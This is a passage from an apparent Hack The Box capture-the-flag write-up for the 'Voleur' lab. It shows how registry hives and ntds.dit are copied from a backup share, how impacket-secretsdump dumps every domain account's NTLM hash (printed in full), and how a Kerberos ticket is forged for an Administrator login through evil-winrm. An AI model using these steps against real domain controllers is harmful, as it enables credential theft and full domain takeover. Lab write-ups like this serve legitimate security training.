dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 30 08:11 ..
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 03:49 'Active Directory'
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 03:49 registry
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups$ ls -laR registry/
registry/:
total 17952
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 03:49 .
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 08:11 ..
-rwxrwxrwx 1 svc_backup svc_backup 32768 Jan 30 03:30 SECURITY
-rwxrwxrwx 1 svc_backup svc_backup 18350080 Jan 30 03:30 SYSTEM
|
Let’s start by getting this first.
- SECURITY – Holds DPAPI system keys, LSA secrets
- SYSTEM – Holds boot key and used to decrypt SAM & DPAPI secrets
This is a full registry backup, used for offline hash & secret extraction.
SCP
1
2
3
4
5
| scp -P 2222 -i ../id_rsa svc_backup@voleur.htb:'/mnt/c/IT/Third-Line Support/Backups/Registry/SYSTEM' .
SYSTEM 100% 18MB 186.4KB/s 01:36
┌──(kali㉿vm-kali)-[~/htb/voleur/SSH_FILES]
└─$ scp -P 2222 -i ../id_rsa svc_backup@voleur.htb:'/mnt/c/IT/Third-Line Support/Backups/Active Directory/ntds.dit' .
|
Getting hashes from SYSTEM Registry
1
| impacket-secretsdump -system SYSTEM -ntds ntds.dit -outputfile hashes LOCAL
|
You should have the hashes file of every user.
1
2
3
4
5
6
7
8
9
10
11
12
13
| cat hashes.ntds
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5aeef2c641148f9173d663be744e323c:::
voleur.htb\ryan.naylor:1103:aad3b435b51404eeaad3b435b51404ee:3988a78c5a072b0a84065a809976ef16:::
voleur.htb\marie.bryant:1104:aad3b435b51404eeaad3b435b51404ee:53978ec648d3670b1b83dd0b5052d5f8:::
voleur.htb\lacey.miller:1105:aad3b435b51404eeaad3b435b51404ee:2ecfe5b9b7e1aa2df942dc108f749dd3:::
voleur.htb\svc_ldap:1106:aad3b435b51404eeaad3b435b51404ee:0493398c124f7af8c1184f9dd80c1307:::
voleur.htb\svc_backup:1107:aad3b435b51404eeaad3b435b51404ee:f44fe33f650443235b2798c72027c573:::
voleur.htb\svc_iis:1108:aad3b435b51404eeaad3b435b51404ee:246566da92d43a35bdea2b0c18c89410:::
voleur.htb\jeremy.combs:1109:aad3b435b51404eeaad3b435b51404ee:7b4c3ae2cbd5d74b7055b7f64c0b3b4c:::
voleur.htb\svc_winrm:1601:aad3b435b51404eeaad3b435b51404ee:5d7e37717757433b4780079ee9b1d421:::
|
Getting a kerberos ticket as admin
We could use Administrator hash to get a kerberos ticket.
1
2
3
4
5
6
7
8
9
| impacket-getTGT 'voleur.htb/administrator' -hashes aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2 -dc-ip 10.10.11.76
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in administrator.ccache
└─$ export KRB5CCNAME=administrator.ccache
┌──(kali㉿vm-kali)-[~/htb/voleur/SSH_FILES]
└─$ evil-winrm -i dc.voleur.htb -r voleur.htb -u administrator
|